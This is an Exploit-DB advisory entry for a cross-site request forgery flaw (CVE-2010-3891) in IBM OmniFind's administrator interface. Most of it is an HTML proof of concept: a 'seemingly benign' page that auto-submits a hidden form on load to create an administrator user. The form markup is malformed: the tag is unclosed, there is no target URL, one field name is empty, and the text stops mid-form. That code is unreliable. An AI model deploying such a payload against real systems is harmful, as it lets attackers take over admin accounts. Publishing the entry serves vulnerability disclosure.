IBM OmniFind CSRF Vulnerability

ID EDB-ID:15473
Type exploitdb
Reporter Fatih Kilic
Modified 2010-11-09T00:00:00


IBM OmniFind CSRF Vulnerability. CVE-2010-3891. Webapps exploits for multiple platform

                                            The forms in the administrator interface are not protected against XSRF. The 
attacker can do any action in the context of the victim. 

An example attack scenario could be:
The attacker creates a malicious website with a prepared form to add a new
user, which will be submitted on load. 

Exploit to add an admin user:
  <head><title>Some seemingly benign web-site</title></head>
  <body onLoad="document.forms[0].submit();">

    <form method="post"
      <input type="hidden" name="command" value="saveNewUser"/>
      <input type="hidden" name="" value="joemueller"/>
      <input type="hidden" name="user.role" value="0"/>
      <input type="hidden" name="user.allCollections" value="true"/>
      <input type="hidden" name="apply" value="OK"/>